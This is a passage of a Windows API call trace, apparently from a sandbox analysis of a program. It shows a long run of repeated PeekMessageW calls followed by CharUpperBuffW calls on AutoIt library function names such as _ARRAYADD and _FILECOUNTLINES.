lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.563] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.564] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.565] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.566] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.568] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.569] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.569] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.569] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.569] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.569] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.569] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.569] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.569] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.569] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.570] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.571] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.573] CharUpperBuffW (in: lpsz="_ARRAYADD", cchLength=0x9 | out: lpsz="_ARRAYADD") returned 0x9 [0119.573] CharUpperBuffW (in: lpsz="_ARRAYBINARYSEARCH", cchLength=0x12 | out: lpsz="_ARRAYBINARYSEARCH") returned 0x12 [0119.573] CharUpperBuffW (in: lpsz="_ARRAYCOLDELETE", cchLength=0xf | out: lpsz="_ARRAYCOLDELETE") returned 0xf [0119.573] CharUpperBuffW (in: lpsz="_ARRAYCOLINSERT", cchLength=0xf | out: lpsz="_ARRAYCOLINSERT") returned 0xf [0119.573] CharUpperBuffW (in: lpsz="_ARRAYCOMBINATIONS", cchLength=0x12 | out: lpsz="_ARRAYCOMBINATIONS") returned 0x12 [0119.573] CharUpperBuffW (in: lpsz="_ARRAYCONCATENATE", cchLength=0x11 | out: lpsz="_ARRAYCONCATENATE") returned 0x11 [0119.573] CharUpperBuffW (in: lpsz="_ARRAYDELETE", cchLength=0xc | out: lpsz="_ARRAYDELETE") returned 0xc [0119.574] CharUpperBuffW (in: lpsz="_ARRAYDISPLAY", cchLength=0xd | out: lpsz="_ARRAYDISPLAY") returned 0xd [0119.574] CharUpperBuffW (in: lpsz="_ARRAYEXTRACT", cchLength=0xd | out: lpsz="_ARRAYEXTRACT") returned 0xd [0119.574] CharUpperBuffW (in: lpsz="_ARRAYFINDALL", cchLength=0xd | out: lpsz="_ARRAYFINDALL") returned 0xd [0119.574] CharUpperBuffW (in: lpsz="_ARRAYINSERT", cchLength=0xc | out: lpsz="_ARRAYINSERT") returned 0xc [0119.574] CharUpperBuffW (in: lpsz="_ARRAYMAX", cchLength=0x9 | out: lpsz="_ARRAYMAX") returned 0x9 [0119.574] CharUpperBuffW (in: lpsz="_ARRAYMAXINDEX", cchLength=0xe | out: lpsz="_ARRAYMAXINDEX") returned 0xe [0119.574] CharUpperBuffW (in: lpsz="_ARRAYMIN", cchLength=0x9 | out: lpsz="_ARRAYMIN") returned 0x9 [0119.574] CharUpperBuffW (in: lpsz="_ARRAYMININDEX", cchLength=0xe | out: lpsz="_ARRAYMININDEX") returned 0xe [0119.574] CharUpperBuffW (in: lpsz="_ARRAYPERMUTE", cchLength=0xd | out: lpsz="_ARRAYPERMUTE") returned 0xd [0119.574] CharUpperBuffW (in: lpsz="_ARRAYPOP", cchLength=0x9 | out: lpsz="_ARRAYPOP") returned 0x9 [0119.574] CharUpperBuffW (in: lpsz="_ARRAYPUSH", cchLength=0xa | out: lpsz="_ARRAYPUSH") returned 0xa [0119.574] CharUpperBuffW (in: lpsz="_ARRAYREVERSE", cchLength=0xd | out: lpsz="_ARRAYREVERSE") returned 0xd [0119.574] CharUpperBuffW (in: lpsz="_ARRAYSEARCH", cchLength=0xc | out: lpsz="_ARRAYSEARCH") returned 0xc [0119.574] CharUpperBuffW (in: lpsz="_ARRAYSHUFFLE", cchLength=0xd | out: lpsz="_ARRAYSHUFFLE") returned 0xd [0119.575] CharUpperBuffW (in: lpsz="_ARRAYSORT", cchLength=0xa | out: lpsz="_ARRAYSORT") returned 0xa [0119.575] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT1D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT1D") returned 0x12 [0119.575] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT2D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT2D") returned 0x12 [0119.575] CharUpperBuffW (in: lpsz="__ARRAYDUALPIVOTSORT", cchLength=0x14 | out: lpsz="__ARRAYDUALPIVOTSORT") returned 0x14 [0119.575] CharUpperBuffW (in: lpsz="_ARRAYSWAP", cchLength=0xa | out: lpsz="_ARRAYSWAP") returned 0xa [0119.575] CharUpperBuffW (in: lpsz="_ARRAYTOCLIP", cchLength=0xc | out: lpsz="_ARRAYTOCLIP") returned 0xc [0119.576] CharUpperBuffW (in: lpsz="_ARRAYTOSTRING", cchLength=0xe | out: lpsz="_ARRAYTOSTRING") returned 0xe [0119.576] CharUpperBuffW (in: lpsz="_ARRAYTRANSPOSE", cchLength=0xf | out: lpsz="_ARRAYTRANSPOSE") returned 0xf [0119.576] CharUpperBuffW (in: lpsz="_ARRAYTRIM", cchLength=0xa | out: lpsz="_ARRAYTRIM") returned 0xa [0119.576] CharUpperBuffW (in: lpsz="_ARRAYUNIQUE", cchLength=0xc | out: lpsz="_ARRAYUNIQUE") returned 0xc [0119.576] CharUpperBuffW (in: lpsz="_ARRAY1DTOHISTOGRAM", cchLength=0x13 | out: lpsz="_ARRAY1DTOHISTOGRAM") returned 0x13 [0119.576] CharUpperBuffW (in: lpsz="__ARRAY_STRINGREPEAT", cchLength=0x14 | out: lpsz="__ARRAY_STRINGREPEAT") returned 0x14 [0119.576] CharUpperBuffW (in: lpsz="__ARRAY_EXETERINTERNAL", cchLength=0x16 | out: lpsz="__ARRAY_EXETERINTERNAL") returned 0x16 [0119.576] CharUpperBuffW (in: lpsz="__ARRAY_COMBINATIONS", cchLength=0x14 | out: lpsz="__ARRAY_COMBINATIONS") returned 0x14 [0119.576] CharUpperBuffW (in: lpsz="__ARRAY_GETNEXT", cchLength=0xf | out: lpsz="__ARRAY_GETNEXT") returned 0xf [0119.576] CharUpperBuffW (in: lpsz="__ARRAY_MINMAXINDEX", cchLength=0x13 | out: lpsz="__ARRAY_MINMAXINDEX") returned 0x13 [0119.576] CharUpperBuffW (in: lpsz="__ARRAY_GREATERTHAN", cchLength=0x13 | out: lpsz="__ARRAY_GREATERTHAN") returned 0x13 [0119.576] CharUpperBuffW (in: lpsz="__ARRAY_LESSTHAN", cchLength=0x10 | out: lpsz="__ARRAY_LESSTHAN") returned 0x10 [0119.576] CharUpperBuffW (in: lpsz="__ARRAYUNIQUE_AUTOERRFUNC", cchLength=0x19 | out: lpsz="__ARRAYUNIQUE_AUTOERRFUNC") returned 0x19 [0119.580] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0119.580] CharUpperBuffW (in: lpsz="_FILECREATE", 